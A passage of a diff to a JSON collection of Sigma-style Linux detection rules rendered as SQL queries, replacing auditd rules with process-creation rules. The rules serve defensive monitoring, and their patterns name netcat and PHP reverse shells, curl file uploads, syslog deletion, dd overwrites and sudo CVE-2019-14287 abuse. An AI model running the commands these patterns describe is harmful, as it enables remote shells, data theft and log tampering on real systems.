with \"hidepid\" parameter to make invisible processes to other users from the system", + "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "tags": [ - "attack.collection", - "attack.t1113" + "attack.credential_access", + "attack.t1564" ], "falsepositives": [ - "Legitimate use of screenshot utility" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((type = 'EXECVE' AND a0 = 'xwd') AND ((a1 = '-root' AND a2 = '-out' AND a3 LIKE '%.xwd' ESCAPE '\\') OR (a1 = '-out' AND a2 LIKE '%.xwd' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Image LIKE '%/mount' ESCAPE '\\' AND CommandLine LIKE '%hidepid=2%' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\')" ], - "filename": "lnx_auditd_screencaputre_xwd.yml" + 
"filename": "proc_creation_lnx_mount_hidepid.yml" }, { - "title": "Unix Shell Configuration Modification", - "id": "a94cdd87-6c54-4678-a6cc-2814ffe5a13d", - "description": "Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened.", - "author": "Peter Matkovski, IAI", + "title": "Potential Netcat Reverse Shell Execution", + "id": "7f734ed0-4f47-46c0-837f-6ee62505abd9", + "description": "Detects execution of netcat with the \"-e\" flag followed by common shells. This could be a sign of a potential reverse shell setup.", + "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Admin or User activity are expected to generate some false positives" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (type = 'PATH' AND (name LIKE '/etc/shells' ESCAPE '\\' OR name LIKE '/etc/profile' ESCAPE '\\' OR name LIKE '/etc/profile.d/%' ESCAPE '\\' OR name LIKE '/etc/bash.bashrc' ESCAPE '\\' OR name LIKE '/etc/bashrc' ESCAPE '\\' OR name LIKE '/etc/zsh/zprofile' ESCAPE '\\' OR name LIKE '/etc/zsh/zshrc' ESCAPE '\\' OR name LIKE '/etc/zsh/zlogin' ESCAPE '\\' OR name LIKE '/etc/zsh/zlogout' ESCAPE '\\' OR name LIKE '/etc/csh.cshrc' ESCAPE '\\' OR name LIKE '/etc/csh.login' ESCAPE '\\' OR name LIKE '/root/.bashrc' ESCAPE '\\' OR name LIKE '/root/.bash\\_profile' ESCAPE '\\' OR name LIKE '/root/.profile' ESCAPE '\\' OR name LIKE '/root/.zshrc' ESCAPE '\\' OR name LIKE '/root/.zprofile' ESCAPE '\\' OR name LIKE '/home/%/.bashrc' ESCAPE '\\' OR name LIKE '/home/%/.zshrc' ESCAPE '\\' OR name LIKE '/home/%/.bash\\_profile' ESCAPE '\\' OR name LIKE '/home/%/.zprofile' ESCAPE '\\' OR name LIKE '/home/%/.profile' ESCAPE '\\' OR name LIKE '/home/%/.bash\\_login' ESCAPE '\\' OR name LIKE '/home/%/.bash\\_logout' ESCAPE '\\' OR 
name LIKE '/home/%/.zlogin' ESCAPE '\\' OR name LIKE '/home/%/.zlogout' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Image LIKE '%/nc' ESCAPE '\\' OR Image LIKE '%/ncat' ESCAPE '\\') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\') AND (CommandLine LIKE '% ash%' ESCAPE '\\' OR CommandLine LIKE '% bash%' ESCAPE '\\' OR CommandLine LIKE '% bsh%' ESCAPE '\\' OR CommandLine LIKE '% csh%' ESCAPE '\\' OR CommandLine LIKE '% ksh%' ESCAPE '\\' OR CommandLine LIKE '% pdksh%' ESCAPE '\\' OR CommandLine LIKE '% sh%' ESCAPE '\\' OR CommandLine LIKE '% tcsh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/ash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/bash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/bsh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/csh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/ksh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/pdksh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/tcsh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/zsh%' ESCAPE '\\' OR CommandLine LIKE '%$IFSash%' ESCAPE '\\' OR CommandLine LIKE '%$IFSbash%' ESCAPE '\\' OR CommandLine LIKE '%$IFSbsh%' ESCAPE '\\' OR CommandLine LIKE '%$IFScsh%' ESCAPE '\\' OR CommandLine LIKE '%$IFSksh%' ESCAPE '\\' OR CommandLine LIKE '%$IFSpdksh%' ESCAPE '\\' OR CommandLine LIKE '%$IFSsh%' ESCAPE '\\' OR CommandLine LIKE '%$IFStcsh%' ESCAPE '\\' OR CommandLine LIKE '%$IFSzsh%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_unix_shell_configuration_modification.yml" + "filename": "proc_creation_lnx_netcat_reverse_shell.yml" }, { - "title": "Systemd Service Creation", - "id": "1bac86ba-41aa-4f62-9d6b-405eac99b485", - "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.", - "author": "Pawel Mazur", + "title": "OMIGOD SCX RunAsProvider ExecuteShellCommand", + "id": "21541900-27a9-4454-9c4c-3f0a4240344a", + "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any 
UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.persistence", - "attack.t1543.002" + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" ], "falsepositives": [ - "Admin work like legit service installs." + "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((type = 'PATH' AND nametype = 'CREATE') AND ((name LIKE '/usr/lib/systemd/system/%' ESCAPE '\\' OR name LIKE '/etc/systemd/system/%' ESCAPE '\\') OR name LIKE '%/.config/systemd/user/%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (User = 'root' AND LogonId = '0' AND CurrentDirectory = '/var/opt/microsoft/scx/tmp' AND CommandLine LIKE '%/bin/sh%' ESCAPE '\\')" ], - "filename": "lnx_auditd_systemd_service_creation.yml" + "filename": "proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml" }, { - "title": "Steganography Extract Files with Steghide", - "id": "a5a827d9-1bbe-4952-9293-c59d897eb41b", - "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", - "author": "Pawel Mazur", + "title": "Enable BPF Kprobes Tracing", + "id": "7692f583-bd30-4008-8615-75dab3f08a99", + "description": "Detects common command used to enable bpf kprobes tracing", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.003" + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (type 
= 'EXECVE' AND a0 = 'steghide' AND a1 = 'extract' AND a2 = '-sf' AND (a3 LIKE '%.jpg' ESCAPE '\\' OR a3 LIKE '%.png' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (CommandLine LIKE '%echo 1 >%' ESCAPE '\\' AND CommandLine LIKE '%/sys/kernel/debug/tracing/events/kprobes/%' ESCAPE '\\' AND (CommandLine LIKE '%/myprobe/enable%' ESCAPE '\\' OR CommandLine LIKE '%/myretprobe/enable%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_steghide_extract_steganography.yml" + "filename": "proc_creation_lnx_bpf_kprob_tracing_enabled.yml" }, { - "title": "Suspicious C2 Activities", - "id": "f7158a64-6204-4d6d-868a-6e6378b467e0", - "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)\n", - "author": "Marie Euler", + "title": "Commands to Clear or Remove the Syslog", + "id": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", + "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks", + "author": "Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1070.002" ], "falsepositives": [ - "Admin or User activity" + "Log rotation." 
], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE key LIKE 'susp\\_activity' ESCAPE '\\'" + "SELECT * FROM logs WHERE (CommandLine LIKE '%rm /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%rm -r /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%rm -f /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%rm -rf /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink -r /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink -f /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%unlink -rf /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '%mv /var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '% >/var/log/syslog%' ESCAPE '\\' OR CommandLine LIKE '% > /var/log/syslog%' ESCAPE '\\')" ], - "filename": "lnx_auditd_susp_c2_commands.yml" + "filename": "proc_creation_lnx_clear_syslog.yml" }, { - "title": "Disable System Firewall", - "id": "53059bc0-1472-438b-956a-7508a94a91f0", - "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", - "author": "Pawel Mazur", + "title": "Clipboard Collection with Xclip Tool", + "id": "ec127035-a636-4b9a-8555-0efd4e59f316", + "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "author": "Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.t1562.004", - "attack.defense_evasion" + "attack.collection", + "attack.t1115" ], "falsepositives": [ - "Admin activity" + "Legitimate usage of xclip tools." 
], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (type LIKE 'SERVICE\\_STOP' ESCAPE '\\' AND unit IN ('firewalld', 'iptables', 'ufw'))" + "SELECT * FROM logs WHERE (Image LIKE '%xclip%' ESCAPE '\\' AND CommandLine LIKE '%-sel%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\')" ], - "filename": "lnx_auditd_disable_system_firewall.yml" + "filename": "proc_creation_lnx_clipboard_collection.yml" }, { - "title": "Creation Of An User Account", - "id": "759d0d51-bc99-4b5e-9add-8f5b2c8e7512", - "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", - "author": "Marie Euler, Pawel Mazur", + "title": "Security Software Discovery - Linux", + "id": "c9d8b7fd-78e4-44fe-88f6-599135d46d60", + "description": "Detects usage of system utilities (only grep and egrep for now) to discover security software discovery", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.t1136.001", - "attack.persistence" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ - "Admin activity" + "Legitimate activities" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((type = 'SYSCALL' AND exe LIKE '%/useradd' ESCAPE '\\') OR type LIKE 'ADD\\_USER' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((Image LIKE '%/grep' ESCAPE '\\' OR Image LIKE '%/egrep' ESCAPE '\\') AND (CommandLine LIKE '%nessusd%' ESCAPE '\\' OR CommandLine LIKE '%td-agent%' ESCAPE '\\' OR CommandLine LIKE '%packetbeat%' ESCAPE '\\' OR CommandLine LIKE '%filebeat%' ESCAPE '\\' OR CommandLine LIKE '%auditbeat%' ESCAPE '\\' OR CommandLine LIKE '%osqueryd%' ESCAPE '\\' OR CommandLine LIKE '%cbagentd%' ESCAPE '\\' OR CommandLine LIKE '%falcond%' ESCAPE '\\'))" ], - "filename": "lnx_auditd_create_account.yml" + "filename": "proc_creation_lnx_security_software_discovery.yml" }, { - 
"title": "Triple Cross eBPF Rootkit Default Persistence", - "id": "1a2ea919-d11d-4d1e-8535-06cda13be20f", - "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. Which both are related to the TripleCross persistence method", + "title": "Vim GTFOBin Abuse - Linux", + "id": "7ab8f73a-fcff-428b-84aa-6a5ff7877dea", + "description": "Detects usage of \"vim\" and it's siblings as a GTFOBin to execute and proxy command and binary execution", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1053.003" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%ebpfbackdoor' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((Image LIKE '%/vim' ESCAPE '\\' OR Image LIKE '%/rvim' ESCAPE '\\' OR Image LIKE '%/vimdiff' ESCAPE '\\') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% --cmd%' ESCAPE '\\') AND (CommandLine LIKE '%:!/%' ESCAPE '\\' OR CommandLine LIKE '%:py %' ESCAPE '\\' OR CommandLine LIKE '%:lua %' ESCAPE '\\' OR CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/bash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/dash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/zsh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/fish%' ESCAPE '\\'))" ], - "filename": "file_event_lnx_triple_cross_rootkit_persistence.yml" + "filename": "proc_creation_lnx_gtfobin_vim.yml" }, { - "title": "Linux Doas Conf File Creation", - "id": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", - "description": "Detects the creation of doas.conf file in linux host platform.", - "author": "Sittikorn S, Teoderick Contreras", + "title": "Sudo Privilege Escalation CVE-2019-14287", + "id": "f74107df-b6c6-4e80-bf00-4170b658162b", + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "author": "Florian Roth (Nextron 
Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1068", + "attack.t1548.003", + "cve.2019.14287" ], "falsepositives": [ "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%/etc/doas.conf' ESCAPE '\\'" + "SELECT * FROM logs WHERE CommandLine LIKE '% -u#%' ESCAPE '\\'" ], - "filename": "file_event_lnx_doas_conf_creation.yml" + "filename": "proc_creation_lnx_sudo_cve_2019_14287.yml" }, { - "title": "Persistence Via Cron Files", - "id": "6c4e2f43-d94d-4ead-b64d-97e53fa2bd05", - "description": "Detects creation of cron file or files in Cron directories which could indicates potential persistence.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "title": "Suspicious Curl Change User Agents - Linux", + "id": "b86d356d-6093-443d-971c-9b07db583c68", + "description": "Detects a suspicious curl process start on linux with set useragent options", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.003" + "attack.command_and_control", + "attack.t1071.001" ], "falsepositives": [ - "Any legitimate cron file." 
+ "Scripts created by developers and admins", + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '/etc/cron.d/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.daily/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.hourly/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.monthly/%' ESCAPE '\\' OR TargetFilename LIKE '/etc/cron.weekly/%' ESCAPE '\\' OR TargetFilename LIKE '/var/spool/cron/crontabs/%' ESCAPE '\\') OR (TargetFilename LIKE '%/etc/cron.allow%' ESCAPE '\\' OR TargetFilename LIKE '%/etc/cron.deny%' ESCAPE '\\' OR TargetFilename LIKE '%/etc/crontab%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%/curl' ESCAPE '\\' AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" ], - "filename": "file_event_lnx_persistence_cron_files.yml" + "filename": "proc_creation_lnx_susp_curl_useragent.yml" }, { - "title": "Triple Cross eBPF Rootkit Default LockFile", - "id": "c0239255-822c-4630-b7f1-35362bcb8f44", - "description": "Detects the creation of the file \"rootlog\" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.", + "title": "Atlassian Confluence CVE-2022-26134", + "id": "7fb14105-530e-4e2e-8cfb-99f7d8700b66", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059", + "cve.2022.26134" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename = '/tmp/rootlog'" + "SELECT * FROM logs WHERE (ParentImage LIKE '/opt/atlassian/confluence/%' ESCAPE '\\' AND ParentImage LIKE '%/java' ESCAPE '\\' AND (CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%bash%' ESCAPE '\\' OR 
CommandLine LIKE '%dash%' ESCAPE '\\' OR CommandLine LIKE '%ksh%' ESCAPE '\\' OR CommandLine LIKE '%zsh%' ESCAPE '\\' OR CommandLine LIKE '%csh%' ESCAPE '\\' OR CommandLine LIKE '%fish%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%wget%' ESCAPE '\\' OR CommandLine LIKE '%python%' ESCAPE '\\'))" ], - "filename": "file_event_lnx_triple_cross_rootkit_lock_file.yml" + "filename": "proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml" }, { - "title": "Persistence Via Sudoers Files", - "id": "ddb26b76-4447-4807-871f-1b035b2bfa5d", - "description": "Detects creation of sudoers file or files in \"sudoers.d\" directory which can be used a potential method to persiste privileges for a specific user.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Scheduled Cron Task/Job - Linux", + "id": "6b14bac8-3e3a-4324-8109-42f0546a347f", + "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. 
Detection will focus on crontab jobs uploaded from the tmp folder.", + "author": "Alejandro Ortuno, oscd.community", "tags": [ + "attack.execution", "attack.persistence", + "attack.privilege_escalation", "attack.t1053.003" ], "falsepositives": [ - "Creation of legitimate files in sudoers.d folder part of administrator work" + "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '/etc/sudoers.d/%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Image LIKE '%crontab' ESCAPE '\\' AND CommandLine LIKE '%/tmp/%' ESCAPE '\\')" ], - "filename": "file_event_lnx_persistence_sudoers_files.yml" - }, - { - "title": "Suspicious Java Children Processes", - "id": "d292e0af-9a18-420c-9525-ec0ac3936892", - "description": "Detects java process spawning suspicious children", + "filename": "proc_creation_lnx_schedule_task_job_cron.yml" + }, + { + "title": "Suspicious Git Clone - Linux", + "id": "cfec9d29-64ec-4a0f-9ffe-0fdb856d5446", + "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.reconnaissance", + "attack.t1593.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ParentImage LIKE '%/java' ESCAPE '\\' AND (CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%bash%' ESCAPE '\\' OR CommandLine LIKE '%dash%' ESCAPE '\\' OR CommandLine LIKE '%ksh%' ESCAPE '\\' OR CommandLine LIKE '%zsh%' ESCAPE '\\' OR CommandLine LIKE '%csh%' ESCAPE '\\' OR CommandLine LIKE '%fish%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%wget%' ESCAPE '\\' OR CommandLine LIKE '%python%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image LIKE '%/git' ESCAPE '\\' AND CommandLine LIKE '% clone %' ESCAPE '\\' AND (CommandLine LIKE '%exploit%' 
ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RCE%' ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_susp_java_children.yml" + "filename": "proc_creation_lnx_susp_git_clone.yml" }, { - "title": "Curl Usage on Linux", - "id": "ea34fb97-e2c4-4afb-810f-785e4459b194", - "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "File and Directory Discovery - Linux", + "id": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", + "description": "Detects usage of system utilities to discover files and directories", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Legitimate activities" ], - "level": "low", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE Image LIKE '%/curl' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((Image LIKE '%/file' ESCAPE '\\' AND CommandLine REGEXP '(.){200,}') OR (Image LIKE '%/ls' ESCAPE '\\' AND CommandLine LIKE '%-R%' ESCAPE '\\') OR Image LIKE '%/find' ESCAPE '\\' OR Image LIKE '%/tree' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_curl_usage.yml" + "filename": "proc_creation_lnx_file_and_directory_discovery.yml" }, { "title": "Triple Cross 
eBPF Rootkit Execve Hijack", 
@@ -1224,276 +1301,274 @@ "filename": "proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml" }, { - "title": "Clipboard Collection with Xclip Tool", - "id": "ec127035-a636-4b9a-8555-0efd4e59f316", - "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", - "author": "Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "title": "Potential PHP Reverse Shell", + "id": "c6714a24-d7d5-4283-a36b-3ffd091d5f7e", + "description": "Detects usage of the PHP CLI with the \"-r\" flag which allows it to run inline PHP code. The rule looks for calls to the \"fsockopen\" function which allows the creation of sockets.\nAttackers often leverage this in combination with functions such as \"exec\" or \"fopen\" to initiate a reverse shell connection.\n", + "author": "@d4ns4n_", "tags": [ - "attack.collection", - "attack.t1115" + "attack.execution" ], "falsepositives": [ - "Legitimate usage of xclip tools." 
+ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%xclip%' ESCAPE '\\' AND CommandLine LIKE '%-sel%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Image LIKE '%/php%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND CommandLine LIKE '%fsockopen%' ESCAPE '\\' AND (CommandLine LIKE '%ash%' ESCAPE '\\' OR CommandLine LIKE '%bash%' ESCAPE '\\' OR CommandLine LIKE '%bsh%' ESCAPE '\\' OR CommandLine LIKE '%csh%' ESCAPE '\\' OR CommandLine LIKE '%ksh%' ESCAPE '\\' OR CommandLine LIKE '%pdksh%' ESCAPE '\\' OR CommandLine LIKE '%sh%' ESCAPE '\\' OR CommandLine LIKE '%tcsh%' ESCAPE '\\' OR CommandLine LIKE '%zsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_clipboard_collection.yml" + "filename": "proc_creation_lnx_php_reverse_shell.yml" }, { - "title": "Decode Base64 Encoded Text", - "id": "e2072cab-8c9a-459b-b63c-40ae79e27031", - "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", - "author": "Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Curl File Upload - Linux", + "id": "00b90cc1-17ec-402c-96ad-3a8117d7a582", + "description": "Detects a suspicious curl process start the adds a file to a web request", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.exfiltration", + "attack.t1567", + "attack.t1105" ], "falsepositives": [ - "Legitimate activities" + "Scripts created by developers and admins" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/base64' ESCAPE '\\' AND CommandLine LIKE '%-d%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Image LIKE '%/curl' ESCAPE '\\' AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE 
'% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_base64_decode.yml" + "filename": "proc_creation_lnx_susp_curl_fileupload.yml" }, { - "title": "Triple Cross eBPF Rootkit Install Commands", - "id": "22236d75-d5a0-4287-bf06-c93b1770860f", - "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DD File Overwrite", + "id": "2953194b-e33c-4859-b9e8-05948c167447", + "description": "Detects potential overwriting and deletion of a file using DD.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.defense_evasion", - "attack.t1014" + "attack.impact", + "attack.t1485" ], "falsepositives": [ - "Unlikely" + "Any user deleting files that way." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/sudo' ESCAPE '\\' AND CommandLine LIKE '% tc %' ESCAPE '\\' AND CommandLine LIKE '% enp0s3 %' ESCAPE '\\' AND (CommandLine LIKE '% qdisc %' ESCAPE '\\' OR CommandLine LIKE '% filter %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Image IN ('/bin/dd', '/usr/bin/dd') AND CommandLine LIKE '%of=%' ESCAPE '\\' AND (CommandLine LIKE '%if=/dev/zero%' ESCAPE '\\' OR CommandLine LIKE '%if=/dev/null%' ESCAPE '\\'))" ], - "filename": "proc_creation_lnx_triple_cross_rootkit_install.yml" + "filename": "proc_creation_lnx_dd_file_overwrite.yml" }, { - "title": "System Network Connections Discovery - Linux", - "id": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", - "description": "Detects usage of system utilities to discover system network connections", - "author": "Daniil Yugoslavskiy, oscd.community", + "title": "Scheduled Task/Job At", + "id": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", + "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey 
are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code\n", + "author": "Ömer Günal, oscd.community", "tags": [ - "attack.discovery", - "attack.t1049" + "attack.persistence", + "attack.t1053.002" ], "falsepositives": [ - "Legitimate activities" + "Legitimate administration activities" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((Image LIKE '%/who' ESCAPE '\\' OR Image LIKE '%/w' ESCAPE '\\' OR Image LIKE '%/last' ESCAPE '\\' OR Image LIKE '%/lsof' ESCAPE '\\' OR Image LIKE '%/netstat' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE '%/usr/bin/landscape-sysinfo%' ESCAPE '\\' AND Image LIKE '%/who' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Image LIKE '%/at' ESCAPE '\\' OR Image LIKE '%/atd' ESCAPE '\\')" ], - "filename": "proc_creation_lnx_system_network_connections_discovery.yml" + "filename": "proc_creation_lnx_at_command.yml" }, { - "title": "Python Spawning Pretty TTY", - "id": "c4042d54-110d-45dd-a0e1-05c47822c937", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "title": "User Added To Root/Sudoers Group Using Usermod", + 